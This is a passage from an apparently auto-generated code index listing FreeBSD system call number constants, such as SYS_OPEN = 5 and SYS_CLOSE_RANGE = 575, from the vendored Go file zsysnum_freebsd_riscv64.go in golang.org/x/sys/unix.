SYS_PWRITE (line 305) | SYS_PWRITE = 476 constant SYS_MMAP (line 306) | SYS_MMAP = 477 constant SYS_LSEEK (line 307) | SYS_LSEEK = 478 constant SYS_TRUNCATE (line 308) | SYS_TRUNCATE = 479 constant SYS_FTRUNCATE (line 309) | SYS_FTRUNCATE = 480 constant SYS_THR_KILL2 (line 310) | SYS_THR_KILL2 = 481 constant SYS_SHM_OPEN (line 311) | SYS_SHM_OPEN = 482 constant SYS_SHM_UNLINK (line 312) | SYS_SHM_UNLINK = 483 constant SYS_CPUSET (line 313) | SYS_CPUSET = 484 constant SYS_CPUSET_SETID (line 314) | SYS_CPUSET_SETID = 485 constant SYS_CPUSET_GETID (line 315) | SYS_CPUSET_GETID = 486 constant SYS_CPUSET_GETAFFINITY (line 316) | SYS_CPUSET_GETAFFINITY = 487 constant SYS_CPUSET_SETAFFINITY (line 317) | SYS_CPUSET_SETAFFINITY = 488 constant SYS_FACCESSAT (line 318) | SYS_FACCESSAT = 489 constant SYS_FCHMODAT (line 319) | SYS_FCHMODAT = 490 constant SYS_FCHOWNAT (line 320) | SYS_FCHOWNAT = 491 constant SYS_FEXECVE (line 321) | SYS_FEXECVE = 492 constant SYS_FUTIMESAT (line 322) | SYS_FUTIMESAT = 494 constant SYS_LINKAT (line 323) | SYS_LINKAT = 495 constant SYS_MKDIRAT (line 324) | SYS_MKDIRAT = 496 constant SYS_MKFIFOAT (line 325) | SYS_MKFIFOAT = 497 constant SYS_OPENAT (line 326) | SYS_OPENAT = 499 constant SYS_READLINKAT (line 327) | SYS_READLINKAT = 500 constant SYS_RENAMEAT (line 328) | SYS_RENAMEAT = 501 constant SYS_SYMLINKAT (line 329) | SYS_SYMLINKAT = 502 constant SYS_UNLINKAT (line 330) | SYS_UNLINKAT = 503 constant SYS_POSIX_OPENPT (line 331) | SYS_POSIX_OPENPT = 504 constant SYS_GSSD_SYSCALL (line 332) | SYS_GSSD_SYSCALL = 505 constant SYS_JAIL_GET (line 333) | SYS_JAIL_GET = 506 constant SYS_JAIL_SET (line 334) | SYS_JAIL_SET = 507 constant SYS_JAIL_REMOVE (line 335) | SYS_JAIL_REMOVE = 508 constant SYS_CLOSEFROM (line 336) | SYS_CLOSEFROM = 509 constant SYS___SEMCTL (line 337) | SYS___SEMCTL = 510 constant SYS_MSGCTL (line 338) | SYS_MSGCTL = 511 constant SYS_SHMCTL (line 339) | SYS_SHMCTL = 512 constant SYS_LPATHCONF (line 340) | SYS_LPATHCONF = 513 constant SYS___CAP_RIGHTS_GET (line 341) | SYS___CAP_RIGHTS_GET = 515 constant SYS_CAP_ENTER (line 342) | SYS_CAP_ENTER = 516 constant SYS_CAP_GETMODE (line 343) | SYS_CAP_GETMODE = 517 constant SYS_PDFORK (line 344) | SYS_PDFORK = 518 constant SYS_PDKILL (line 345) | SYS_PDKILL = 519 constant SYS_PDGETPID (line 346) | SYS_PDGETPID = 520 constant SYS_PSELECT (line 347) | SYS_PSELECT = 522 constant SYS_GETLOGINCLASS (line 348) | SYS_GETLOGINCLASS = 523 constant SYS_SETLOGINCLASS (line 349) | SYS_SETLOGINCLASS = 524 constant SYS_RCTL_GET_RACCT (line 350) | SYS_RCTL_GET_RACCT = 525 constant SYS_RCTL_GET_RULES (line 351) | SYS_RCTL_GET_RULES = 526 constant SYS_RCTL_GET_LIMITS (line 352) | SYS_RCTL_GET_LIMITS = 527 constant SYS_RCTL_ADD_RULE (line 353) | SYS_RCTL_ADD_RULE = 528 constant SYS_RCTL_REMOVE_RULE (line 354) | SYS_RCTL_REMOVE_RULE = 529 constant SYS_POSIX_FALLOCATE (line 355) | SYS_POSIX_FALLOCATE = 530 constant SYS_POSIX_FADVISE (line 356) | SYS_POSIX_FADVISE = 531 constant SYS_WAIT6 (line 357) | SYS_WAIT6 = 532 constant SYS_CAP_RIGHTS_LIMIT (line 358) | SYS_CAP_RIGHTS_LIMIT = 533 constant SYS_CAP_IOCTLS_LIMIT (line 359) | SYS_CAP_IOCTLS_LIMIT = 534 constant SYS_CAP_IOCTLS_GET (line 360) | SYS_CAP_IOCTLS_GET = 535 constant SYS_CAP_FCNTLS_LIMIT (line 361) | SYS_CAP_FCNTLS_LIMIT = 536 constant SYS_CAP_FCNTLS_GET (line 362) | SYS_CAP_FCNTLS_GET = 537 constant SYS_BINDAT (line 363) | SYS_BINDAT = 538 constant SYS_CONNECTAT (line 364) | SYS_CONNECTAT = 539 constant SYS_CHFLAGSAT (line 365) | SYS_CHFLAGSAT = 540 constant SYS_ACCEPT4 (line 366) | SYS_ACCEPT4 = 541 constant SYS_PIPE2 (line 367) | SYS_PIPE2 = 542 constant SYS_AIO_MLOCK (line 368) | SYS_AIO_MLOCK = 543 constant SYS_PROCCTL (line 369) | SYS_PROCCTL = 544 constant SYS_PPOLL (line 370) | SYS_PPOLL = 545 constant SYS_FUTIMENS (line 371) | SYS_FUTIMENS = 546 constant SYS_UTIMENSAT (line 372) | SYS_UTIMENSAT = 547 constant SYS_FDATASYNC (line 373) | SYS_FDATASYNC = 550 constant SYS_FSTAT (line 374) | SYS_FSTAT = 551 constant SYS_FSTATAT (line 375) | SYS_FSTATAT = 552 constant SYS_FHSTAT (line 376) | SYS_FHSTAT = 553 constant SYS_GETDIRENTRIES (line 377) | SYS_GETDIRENTRIES = 554 constant SYS_STATFS (line 378) | SYS_STATFS = 555 constant SYS_FSTATFS (line 379) | SYS_FSTATFS = 556 constant SYS_GETFSSTAT (line 380) | SYS_GETFSSTAT = 557 constant SYS_FHSTATFS (line 381) | SYS_FHSTATFS = 558 constant SYS_MKNODAT (line 382) | SYS_MKNODAT = 559 constant SYS_KEVENT (line 383) | SYS_KEVENT = 560 constant SYS_CPUSET_GETDOMAIN (line 384) | SYS_CPUSET_GETDOMAIN = 561 constant SYS_CPUSET_SETDOMAIN (line 385) | SYS_CPUSET_SETDOMAIN = 562 constant SYS_GETRANDOM (line 386) | SYS_GETRANDOM = 563 constant SYS_GETFHAT (line 387) | SYS_GETFHAT = 564 constant SYS_FHLINK (line 388) | SYS_FHLINK = 565 constant SYS_FHLINKAT (line 389) | SYS_FHLINKAT = 566 constant SYS_FHREADLINK (line 390) | SYS_FHREADLINK = 567 constant SYS___SYSCTLBYNAME (line 391) | SYS___SYSCTLBYNAME = 570 constant SYS_CLOSE_RANGE (line 392) | SYS_CLOSE_RANGE = 575 FILE: vendor/golang.org/x/sys/unix/zsysnum_freebsd_riscv64.go constant SYS_EXIT (line 10) | SYS_EXIT = 1 constant SYS_FORK (line 11) | SYS_FORK = 2 constant SYS_READ (line 12) | SYS_READ = 3 constant SYS_WRITE (line 13) | SYS_WRITE = 4 constant SYS_OPEN (line 14) | SYS_OPEN = 5 constant SYS_CLOSE (line 15) | SYS_CLOSE = 6 constant SYS_WAIT4 (line 16) | SYS_WAIT4 = 7 constant SYS_LINK (line 17) | SYS_LINK = 9 constant SYS_UNLINK (line 18) | SYS_UNLINK = 10 constant SYS_CHDIR (line 19) | SYS_CHDIR = 12 constant SYS_FCHDIR (line 20) | SYS_FCHDIR = 13 constant SYS_CHMOD (line 21) | SYS_CHMOD = 15 constant SYS_CHOWN (line 22) | SYS_CHOWN = 16 constant SYS_BREAK (line 23) | SYS_BREAK = 17 constant SYS_GETPID (line 24) | SYS_GETPID = 20 constant SYS_MOUNT (line 25) | SYS_MOUNT = 21 constant SYS_UNMOUNT (line 26) | SYS_UNMOUNT = 22 constant SYS_SETUID (line 27) | SYS_SETUID = 23 constant SYS_GETUID (line 28) | SYS_GETUID = 24 constant SYS_GETEUID (line 29) | SYS_GETEUID = 25 constant SYS_PTRACE (line 30) | SYS_PTRACE = 26 constant SYS_RECVMSG (line 31) | SYS_RECVMSG = 27 constant SYS_SENDMSG (line 32) | SYS_SENDMSG = 28 constant SYS_RECVFROM (line 33) | SYS_RECVFROM = 29 constant SYS_ACCEPT (line 34) | SYS_ACCEPT = 30 constant SYS_GETPEERNAME (line 35) | SYS_GETPEERNAME = 31 constant SYS_GETSOCKNAME (line 36) | SYS_GETSOCKNAME = 32 constant SYS_ACCESS (line 37) | SYS_ACCESS = 33 constant SYS_CHFLAGS (line 38) | SYS_CHFLAGS = 34 constant SYS_FCHFLAGS (line 39) | SYS_FCHFLAGS = 35 constant SYS_SYNC (line 40) | SYS_SYNC = 36 constant SYS_KILL (line 41) | SYS_KILL = 37 constant SYS_GETPPID (line 42) | SYS_GETPPID = 39 constant SYS_DUP (line 43) | SYS_DUP = 41 constant SYS_GETEGID (line 44) | SYS_GETEGID = 43 constant SYS_PROFIL (line 45) | SYS_PROFIL = 44 constant SYS_KTRACE (line 46) | SYS_KTRACE = 45 constant SYS_GETGID (line 47) | SYS_GETGID = 47 constant SYS_GETLOGIN (line 48) | SYS_GETLOGIN = 49 constant SYS_SETLOGIN (line 49) | SYS_SETLOGIN = 50 constant SYS_ACCT (line 50) | SYS_ACCT = 51 constant SYS_SIGALTSTACK (line 51) | SYS_SIGALTSTACK = 53 constant SYS_IOCTL (line 52) | SYS_IOCTL = 54 constant SYS_REBOOT (line 53) | SYS_REBOOT = 55 constant SYS_REVOKE (line 54) | SYS_REVOKE = 56 constant SYS_SYMLINK (line 55) | SYS_SYMLINK = 57 constant SYS_READLINK (line 56) | SYS_READLINK = 58 constant SYS_EXECVE (line 57) | SYS_EXECVE = 59 constant SYS_UMASK (line 58) | SYS_UMASK = 60 constant SYS_CHROOT (line 59) | SYS_CHROOT = 61 constant SYS_MSYNC (line 60) | SYS_MSYNC = 65 constant SYS_VFORK (line 61) | SYS_VFORK = 66 constant SYS_SBRK (line 62) | SYS_SBRK = 69 constant SYS_SSTK (line 63) | SYS_SSTK = 70 constant SYS_MUNMAP (line 64) | SYS_MUNMAP = 73 constant SYS_MPROTECT (line 65) | SYS_MPROTECT = 74 constant SYS_MADVISE (line 66) | SYS_MADVISE = 75 constant SYS_MINCORE (line 67) | SYS_MINCORE = 78 constant SYS_GETGROUPS (line 68) | SYS_GETGROUPS = 79 constant SYS_SETGROUPS (line 69) | SYS_SETGROUPS = 80 constant SYS_GETPGRP (line 70) | SYS_GETPGRP = 81 constant SYS_SETPGID (line 71) | SYS_SETPGID = 82 constant SYS_SETITIMER (line 72) | SYS_SETITIMER = 83 constant SYS_SWAPON (line 73) | SYS_SWAPON = 85 constant SYS_GETITIMER (line 74) | SYS_GETITIMER = 86 constant SYS_GETDTABLESIZE (line 75) | SYS_GETDTABLESIZE = 89 constant SYS_DUP2 (line 76) | SYS_DUP2 = 90 constant SYS_FCNTL (line 77) | SYS_FCNTL = 92 constant SYS_SELECT (line 78) | SYS_SELECT = 93 constant SYS_FSYNC (line 79) | SYS_FSYNC = 95 constant SYS_SETPRIORITY (line 80) | SYS_SETPRIORITY = 96 constant SYS_SOCKET (line 81) | SYS_SOCKET = 97 constant SYS_CONNECT (line 82) | SYS_CONNECT = 98 constant SYS_GETPRIORITY (line 83) | SYS_GETPRIORITY = 100 constant SYS_BIND (line 84) | SYS_BIND = 104 constant SYS_SETSOCKOPT (line 85) | SYS_SETSOCKOPT = 105 constant SYS_LISTEN (line 86) | SYS_LISTEN = 106 constant SYS_GETTIMEOFDAY (line 87) | SYS_GETTIMEOFDAY = 116 constant SYS_GETRUSAGE (line 88) | SYS_GETRUSAGE = 117 constant SYS_GETSOCKOPT (line 89) | SYS_GETSOCKOPT = 118 constant SYS_READV (line 90) | SYS_READV = 120 constant SYS_WRITEV (line 91) | SYS_WRITEV = 121 constant SYS_SETTIMEOFDAY (line 92) | SYS_SETTIMEOFDAY = 122 constant SYS_FCHOWN (line 93) | SYS_FCHOWN = 123 constant SYS_FCHMOD (line 94) | SYS_FCHMOD = 124 constant SYS_SETREUID (line 95) | SYS_SETREUID = 126 constant SYS_SETREGID (line 96) | SYS_SETREGID = 127 constant SYS_RENAME (line 97) | SYS_RENAME = 128 constant SYS_FLOCK (line 98) | SYS_FLOCK = 131 constant SYS_MKFIFO (line 99) | SYS_MKFIFO = 132 constant SYS_SENDTO (line 100) | SYS_SENDTO = 133 constant SYS_SHUTDOWN (line 101) | SYS_SHUTDOWN = 134 constant SYS_SOCKETPAIR (line 102) | SYS_SOCKETPAIR = 135 constant SYS_MKDIR (line 103) | SYS_MKDIR = 136 constant SYS_RMDIR (line 104) | SYS_RMDIR = 137 constant SYS_UTIMES (line 105) | SYS_UTIMES = 138 constant SYS_ADJTIME (line 106) | SYS_ADJTIME = 140 constant SYS_SETSID (line 107) | SYS_SETSID = 147 constant SYS_QUOTACTL (line 108) | SYS_QUOTACTL = 148 constant SYS_NLM_SYSCALL (line 109) | SYS_NLM_SYSCALL = 154 constant SYS_NFSSVC (line 110) | SYS_NFSSVC = 155 constant SYS_LGETFH (line 111) | SYS_LGETFH = 160 constant SYS_GETFH (line 112) | SYS_GETFH = 161 constant SYS_SYSARCH (line 113) | SYS_SYSARCH = 165 constant SYS_RTPRIO (line 114) | SYS_RTPRIO = 166 constant SYS_SEMSYS (line 115) | SYS_SEMSYS = 169 constant SYS_MSGSYS (line 116) | SYS_MSGSYS = 170 constant SYS_SHMSYS (line 117) | SYS_SHMSYS = 171 constant SYS_SETFIB (line 118) | SYS_SETFIB = 175 constant SYS_NTP_ADJTIME (line 119) | SYS_NTP_ADJTIME = 176 constant SYS_SETGID (line 120) | SYS_SETGID = 181 constant SYS_SETEGID (line 121) | SYS_SETEGID = 182 constant SYS_SETEUID (line 122) | SYS_SETEUID = 183 constant SYS_PATHCONF (line 123) | SYS_PATHCONF = 191 constant SYS_FPATHCONF (line 124) | SYS_FPATHCONF = 192 constant SYS_GETRLIMIT (line 125) | SYS_GETRLIMIT = 194 constant SYS_SETRLIMIT (line 126) | SYS_SETRLIMIT = 195 constant SYS___SYSCTL (line 127) | SYS___SYSCTL = 202 constant SYS_MLOCK (line 128) | SYS_MLOCK = 203 constant SYS_MUNLOCK (line 129) | SYS_MUNLOCK = 204 constant SYS_UNDELETE (line 130) | SYS_UNDELETE = 205 constant SYS_FUTIMES (line 131) | SYS_FUTIMES = 206 constant SYS_GETPGID (line 132) | SYS_GETPGID = 207 constant SYS_POLL (line 133) | SYS_POLL = 209 constant SYS_SEMGET (line 134) | SYS_SEMGET = 221 constant SYS_SEMOP (line 135) | SYS_SEMOP = 222 constant SYS_MSGGET (line 136) | SYS_MSGGET = 225 constant SYS_MSGSND (line 137) | SYS_MSGSND = 226 constant SYS_MSGRCV (line 138) | SYS_MSGRCV = 227 constant SYS_SHMAT (line 139) | SYS_SHMAT = 228 constant SYS_SHMDT (line 140) | SYS_SHMDT = 230 constant SYS_SHMGET (line 141) | SYS_SHMGET = 231 constant SYS_CLOCK_GETTIME (line 142) | SYS_CLOCK_GETTIME = 232 constant SYS_CLOCK_SETTIME (line 143) | SYS_CLOCK_SETTIME = 233 constant SYS_CLOCK_GETRES (line 144) | SYS_CLOCK_GETRES = 234 constant SYS_KTIMER_CREATE (line 145) | SYS_KTIMER_CREATE = 235 constant SYS_KTIMER_DELETE (line 146) | SYS_KTIMER_DELETE = 236 constant SYS_KTIMER_SETTIME (line 147) | SYS_KTIMER_SETTIME = 237 constant SYS_KTIMER_GETTIME (line 148) | SYS_KTIMER_GETTIME = 238 constant SYS_KTIMER_GETOVERRUN (line 149) | SYS_KTIMER_GETOVERRUN = 239 constant SYS_NANOSLEEP (line 150) | SYS_NANOSLEEP = 240 constant SYS_FFCLOCK_GETCOUNTER (line 151) | SYS_FFCLOCK_GETCOUNTER = 241 constant SYS_FFCLOCK_SETESTIMATE (line 152) | SYS_FFCLOCK_SETESTIMATE = 242 constant SYS_FFCLOCK_GETESTIMATE (line 153) | SYS_FFCLOCK_GETESTIMATE = 243 constant SYS_CLOCK_NANOSLEEP (line 154) | SYS_CLOCK_NANOSLEEP = 244 constant SYS_CLOCK_GETCPUCLOCKID2 (line 155) | SYS_CLOCK_GETCPUCLOCKID2 = 247 constant SYS_NTP_GETTIME (line 156) | SYS_NTP_GETTIME = 248 constant SYS_MINHERIT (line 157) | SYS_MINHERIT = 250 constant SYS_RFORK (line 158) | SYS_RFORK = 251 constant SYS_ISSETUGID (line 159) | SYS_ISSETUGID = 253 constant SYS_LCHOWN (line 160) | SYS_LCHOWN = 254 constant SYS_AIO_READ (line 161) | SYS_AIO_READ = 255 constant SYS_AIO_WRITE (line 162) | SYS_AIO_WRITE = 256 constant SYS_LIO_LISTIO (line 163) | SYS_LIO_LISTIO = 257 constant SYS_LCHMOD (line 164) | SYS_LCHMOD = 274 constant SYS_LUTIMES (line 165) | SYS_LUTIMES = 276 constant SYS_PREADV (line 166) | SYS_PREADV = 289 constant SYS_PWRITEV (line 167) | SYS_PWRITEV = 290 constant SYS_FHOPEN (line 168) | SYS_FHOPEN = 298 constant SYS_MODNEXT (line 169) | SYS_MODNEXT = 300 constant SYS_MODSTAT (line 170) | SYS_MODSTAT = 301 constant SYS_MODFNEXT (line 171) | SYS_MODFNEXT = 302 constant SYS_MODFIND (line 172) | SYS_MODFIND = 303 constant SYS_KLDLOAD (line 173) | SYS_KLDLOAD = 304 constant SYS_KLDUNLOAD (line 174) | SYS_KLDUNLOAD = 305 constant SYS_KLDFIND (line 175) | SYS_KLDFIND = 306 constant SYS_KLDNEXT (line 176) | SYS_KLDNEXT = 307 constant SYS_KLDSTAT (line 177) | SYS_KLDSTAT = 308 constant SYS_KLDFIRSTMOD (line 178) | SYS_KLDFIRSTMOD = 309 constant SYS_GETSID (line 179) | SYS_GETSID = 310 constant SYS_SETRESUID (line 180) | SYS_SETRESUID = 311 constant SYS_SETRESGID (line 181) | SYS_SETRESGID = 312 constant SYS_AIO_RETURN (line 182) | SYS_AIO_RETURN = 314 constant SYS_AIO_SUSPEND (line 183) | SYS_AIO_SUSPEND = 315 constant SYS_AIO_CANCEL (line 184) | SYS_AIO_CANCEL = 316 constant SYS_AIO_ERROR (line 185) | SYS_AIO_ERROR = 317 constant SYS_YIELD (line 186) | SYS_YIELD = 321 constant SYS_MLOCKALL (line 187) | SYS_MLOCKALL = 324 constant SYS_MUNLOCKALL (line 188) | SYS_MUNLOCKALL = 325 constant SYS___GETCWD (line 189) | SYS___GETCWD = 326 constant SYS_SCHED_SETPARAM (line 190) | SYS_SCHED_SETPARAM = 327 constant SYS_SCHED_GETPARAM (line 191) | SYS_SCHED_GETPARAM = 328 constant SYS_SCHED_SETSCHEDULER (line 192) | SYS_SCHED_SETSCHEDULER = 329 constant SYS_SCHED_GETSCHEDULER (line 193) | SYS_SCHED_GETSCHEDULER = 330 constant SYS_SCHED_YIELD (line 194) | SYS_SCHED_YIELD = 331 constant SYS_SCHED_GET_PRIORITY_MAX (line 195) | SYS_SCHED_GET_PRIORITY_MAX = 332 constant SYS_SCHED_GET_PRIORITY_MIN (line 196) | SYS_SCHED_GET_PRIORITY_MIN = 333 constant SYS_SCHED_RR_GET_INTERVAL (line 197) | SYS_SCHED_RR_GET_INTERVAL = 334 constant SYS_UTRACE (line 198) | SYS_UTRACE = 335 constant SYS_KLDSYM (line 199) | SYS_KLDSYM = 337 constant SYS_JAIL (line 200) | SYS_JAIL = 338 constant SYS_SIGPROCMASK (line 201) | SYS_SIGPROCMASK = 340 constant SYS_SIGSUSPEND (line 202) | SYS_SIGSUSPEND = 341 constant SYS_SIGPENDING (line 203) | SYS_SIGPENDING = 343 constant SYS_SIGTIMEDWAIT (line 204) | SYS_SIGTIMEDWAIT = 345 constant SYS_SIGWAITINFO (line 205) | SYS_SIGWAITINFO = 346 constant SYS___ACL_GET_FILE (line 206) | SYS___ACL_GET_FILE = 347 constant SYS___ACL_SET_FILE (line 207) | SYS___ACL_SET_FILE = 348 constant SYS___ACL_GET_FD (line 208) | SYS___ACL_GET_FD = 349 constant SYS___ACL_SET_FD (line 209) | SYS___ACL_SET_FD = 350 constant SYS___ACL_DELETE_FILE (line 210) | SYS___ACL_DELETE_FILE = 351 constant SYS___ACL_DELETE_FD (line 211) | SYS___ACL_DELETE_FD = 352 constant SYS___ACL_ACLCHECK_FILE (line 212) | SYS___ACL_ACLCHECK_FILE = 353 constant SYS___ACL_ACLCHECK_FD (line 213) | SYS___ACL_ACLCHECK_FD = 354 constant SYS_EXTATTRCTL (line 214) | SYS_EXTATTRCTL = 355 constant SYS_EXTATTR_SET_FILE (line 215) | SYS_EXTATTR_SET_FILE = 356 constant SYS_EXTATTR_GET_FILE (line 216) | SYS_EXTATTR_GET_FILE = 357 constant SYS_EXTATTR_DELETE_FILE (line 217) | SYS_EXTATTR_DELETE_FILE = 358 constant SYS_AIO_WAITCOMPLETE (line 218) | SYS_AIO_WAITCOMPLETE = 359 constant SYS_GETRESUID (line 219) | SYS_GETRESUID = 360 constant SYS_GETRESGID (line 220) | SYS_GETRESGID = 361 constant SYS_KQUEUE (line 221) | SYS_KQUEUE = 362 constant SYS_EXTATTR_SET_FD (line 222) | SYS_EXTATTR_SET_FD = 371 constant SYS_EXTATTR_GET_FD (line 223) | SYS_EXTATTR_GET_FD = 372 constant SYS_EXTATTR_DELETE_FD (line 224) | SYS_EXTATTR_DELETE_FD = 373 constant SYS___SETUGID (line 225) | SYS___SETUGID = 374 constant SYS_EACCESS (line 226) | SYS_EACCESS = 376 constant SYS_NMOUNT (line 227) | SYS_NMOUNT = 378 constant SYS___MAC_GET_PROC (line 228) | SYS___MAC_GET_PROC = 384 constant SYS___MAC_SET_PROC (line 229) | SYS___MAC_SET_PROC = 385 constant SYS___MAC_GET_FD (line 230) | SYS___MAC_GET_FD = 386 constant SYS___MAC_GET_FILE (line 231) | SYS___MAC_GET_FILE = 387 constant SYS___MAC_SET_FD (line 232) | SYS___MAC_SET_FD = 388 constant SYS___MAC_SET_FILE (line 233) | SYS___MAC_SET_FILE = 389 constant SYS_KENV (line 234) | SYS_KENV = 390 constant SYS_LCHFLAGS (line 235) | SYS_LCHFLAGS = 391 constant SYS_UUIDGEN (line 236) | SYS_UUIDGEN = 392 constant SYS_SENDFILE (line 237) | SYS_SENDFILE = 393 constant SYS_MAC_SYSCALL (line 238) | SYS_MAC_SYSCALL = 394 constant SYS_KSEM_CLOSE (line 239) | SYS_KSEM_CLOSE = 400 constant SYS_KSEM_POST (line 240) | SYS_KSEM_POST = 401 constant SYS_KSEM_WAIT (line 241) | SYS_KSEM_WAIT = 402 constant SYS_KSEM_TRYWAIT (line 242) | SYS_KSEM_TRYWAIT = 403 constant SYS_KSEM_INIT (line 243) | SYS_KSEM_INIT = 404 constant SYS_KSEM_OPEN (line 244) | SYS_KSEM_OPEN = 405 constant SYS_KSEM_UNLINK (line 245) | SYS_KSEM_UNLINK = 406 constant SYS_KSEM_GETVALUE (line 246) | SYS_KSEM_GETVALUE = 407 constant SYS_KSEM_DESTROY (line 247) | SYS_KSEM_DESTROY = 408 constant SYS___MAC_GET_PID (line 248) | SYS___MAC_GET_PID = 409 constant SYS___MAC_GET_LINK (line 249) | SYS___MAC_GET_LINK = 410 constant SYS___MAC_SET_LINK (line 250) | SYS___MAC_SET_LINK = 411 constant SYS_EXTATTR_SET_LINK (line 251) | SYS_EXTATTR_SET_LINK = 412 constant SYS_EXTATTR_GET_LINK (line 252) | SYS_EXTATTR_GET_LINK = 413 constant SYS_EXTATTR_DELETE_LINK (line 253) | SYS_EXTATTR_DELETE_LINK = 414 constant SYS___MAC_EXECVE (line 254) | SYS___MAC_EXECVE = 415 constant SYS_SIGACTION (line 255) | SYS_SIGACTION = 416 constant SYS_SIGRETURN (line 256) | SYS_SIGRETURN = 417 constant SYS_GETCONTEXT (line 257) | SYS_GETCONTEXT = 421 constant SYS_SETCONTEXT (line 258) | SYS_SETCONTEXT = 422 constant SYS_SWAPCONTEXT (line 259) | SYS_SWAPCONTEXT = 423 constant SYS_SWAPOFF (line 260) | SYS_SWAPOFF = 424 constant SYS___ACL_GET_LINK (line 261) | SYS___ACL_GET_LINK = 425 constant SYS___ACL_SET_LINK (line 262) | SYS___ACL_SET_LINK = 426 constant SYS___ACL_DELETE_LINK (line 263) | SYS___ACL_DELETE_LINK = 427 constant SYS___ACL_ACLCHECK_LINK (line 264) | SYS___ACL_ACLCHECK_LINK = 428 constant SYS_SIGWAIT (line 265) | SYS_SIGWAIT = 429 constant SYS_THR_CREATE (line 266) | SYS_THR_CREATE = 430 constant SYS_THR_EXIT (line 267) | SYS_THR_EXIT = 431 constant SYS_THR_SELF (line 268) | SYS_THR_SELF = 432 constant SYS_THR_KILL (line 269) | SYS_THR_KILL = 433 constant SYS_JAIL_ATTACH (line 270) | SYS_JAIL_ATTACH = 436 constant SYS_EXTATTR_LIST_FD (line 271) | SYS_EXTATTR_LIST_FD = 437 constant SYS_EXTATTR_LIST_FILE (line 272) | SYS_EXTATTR_LIST_FILE = 438 constant SYS_EXTATTR_LIST_LINK (line 273) | SYS_EXTATTR_LIST_LINK = 439 constant SYS_KSEM_TIMEDWAIT (line 274) | SYS_KSEM_TIMEDWAIT = 441 constant SYS_THR_SUSPEND (line 275) | SYS_THR_SUSPEND = 442 constant SYS_THR_WAKE (line 276) | SYS_THR_WAKE = 443 constant SYS_KLDUNLOADF (line 277) | SYS_KLDUNLOADF = 444 constant SYS_AUDIT (line 278) | SYS_AUDIT = 445 constant SYS_AUDITON (line 279) | SYS_AUDITON = 446 constant SYS_GETAUID (line 280) | SYS_GETAUID = 447 constant SYS_SETAUID (line 281) | SYS_SETAUID = 448 constant SYS_GETAUDIT (line 282) | SYS_GETAUDIT = 449 constant SYS_SETAUDIT (line 283) | SYS_SETAUDIT = 450 constant SYS_GETAUDIT_ADDR (line 284) | SYS_GETAUDIT_ADDR = 451 constant SYS_SETAUDIT_ADDR (line 285) | SYS_SETAUDIT_ADDR = 452 constant SYS_AUDITCTL (line 286) | SYS_AUDITCTL = 453 constant SYS__UMTX_OP (line 287) | SYS__UMTX_OP = 454 constant SYS_THR_NEW (line 288) | SYS_THR_NEW = 455 constant SYS_SIGQUEUE (line 289) | SYS_SIGQUEUE = 456 constant SYS_KMQ_OPEN (line 290) | SYS_KMQ_OPEN = 457 constant SYS_KMQ_SETATTR (line 291) | SYS_KMQ_SETATTR = 458 constant SYS_KMQ_TIMEDRECEIVE (line 292) | SYS_KMQ_TIMEDRECEIVE = 459 constant SYS_KMQ_TIMEDSEND (line 293) | SYS_KMQ_TIMEDSEND = 460 constant SYS_KMQ_NOTIFY (line 294) | SYS_KMQ_NOTIFY = 461 constant SYS_KMQ_UNLINK (line 295) | SYS_KMQ_UNLINK = 462 constant SYS_ABORT2 (line 296) | SYS_ABORT2 = 463 constant SYS_THR_SET_NAME (line 297) | SYS_THR_SET_NAME = 464 constant SYS_AIO_FSYNC (line 298) | SYS_AIO_FSYNC = 465 constant SYS_RTPRIO_THREAD (line 299) | SYS_RTPRIO_THREAD = 466 constant SYS_SCTP_PEELOFF (line 300) | SYS_SCTP_PEELOFF = 471 constant SYS_SCTP_GENERIC_SENDMSG (line 301) | SYS_SCTP_GENERIC_SENDMSG = 472 constant SYS_SCTP_GENERIC_SENDMSG_IOV (line 302) | SYS_SCTP_GENERIC_SENDMSG_IOV = 473 constant SYS_SCTP_GENERIC_RECVMSG (line 303) | SYS_SCTP_GENERIC_RECVMSG = 474 constant SYS_PREAD (line 304) | SYS_PREAD = 475 constant SYS_PWRITE (line 305) | SYS_PWRITE = 476 constant SYS_MMAP (line 306) | SYS_MMAP = 477 constant SYS_LSEEK (line 307) | SYS_LSEEK = 478 constant SYS_TRUNCATE (line 308) | SYS_TRUNCATE = 479 constant SYS_FTRUNCATE (line 309) | SYS_FTRUNCATE = 480 constant SYS_THR_KILL2 (line 310) | SYS_THR_KILL2 = 481 constant SYS_SHM_OPEN (line 311) | SYS_SHM_OPEN = 482 constant SYS_SHM_UNLINK (line 312) | SYS_SHM_UNLINK = 483 constant SYS_CPUSET (line 313) | SYS_CPUSET = 484 constant SYS_CPUSET_SETID (line 314) | SYS_CPUSET_SETID = 485 constant SYS_CPUSET_GETID (line 315) | SYS_CPUSET_GETID = 486 constant SYS_CPUSET_GETAFFINITY (line 316) | SYS_CPUSET_GETAFFINITY = 487 constant SYS_CPUSET_SETAFFINITY (line 317) | SYS_CPUSET_SETAFFINITY = 488 constant SYS_FACCESSAT (line 318) | SYS_FACCESSAT = 489 constant SYS_FCHMODAT (line 319) | SYS_FCHMODAT = 490 constant SYS_FCHOWNAT (line 320) | SYS_FCHOWNAT = 491 constant SYS_FEXECVE (line 321) | SYS_FEXECVE = 492 constant SYS_FUTIMESAT (line 322) | SYS_FUTIMESAT = 494 constant SYS_LINKAT (line 323) | SYS_LINKAT = 495 constant SYS_MKDIRAT (line 324) | SYS_MKDIRAT = 496 constant SYS_MKFIFOAT (line 325) | SYS_MKFIFOAT = 497 constant SYS_OPENAT (line 326) | SYS_OPENAT = 499 constant SYS_READLINKAT (line 327) | SYS_READLINKAT = 500 constant SYS_RENAMEAT (line 328) | SYS_RENAMEAT = 501 constant SYS_SYMLINKAT (line 329) | SYS_SYMLINKAT = 502 constant SYS_UNLINKAT (line 330) | SYS_UNLINKAT = 503 constant SYS_POSIX_OPENPT (line 331) | SYS_POSIX_OPENPT = 504 constant SYS_GSSD_SYSCALL (line 332) | SYS_GSSD_SYSCALL = 505 constant SYS_JAIL_GET (line 333) | SYS_JAIL_GET = 506 constant SYS_JAIL_SET (line 334) | SYS_JAIL_SET = 507 constant SYS_JAIL_REMOVE (line 335) | SYS_JAIL_REMOVE = 508 constant SYS_CLOSEFROM (line 336) | SYS_CLOSEFROM = 509 constant SYS___SEMCTL (line 337) | SYS___SEMCTL = 510 constant SYS_MSGCTL (line 338) | SYS_MSGCTL = 511 constant SYS_SHMCTL (line 339) | SYS_SHMCTL = 512 constant SYS_LPATHCONF (line 340) | SYS_LPATHCONF = 513 constant SYS___CAP_RIGHTS_GET (line 341) | 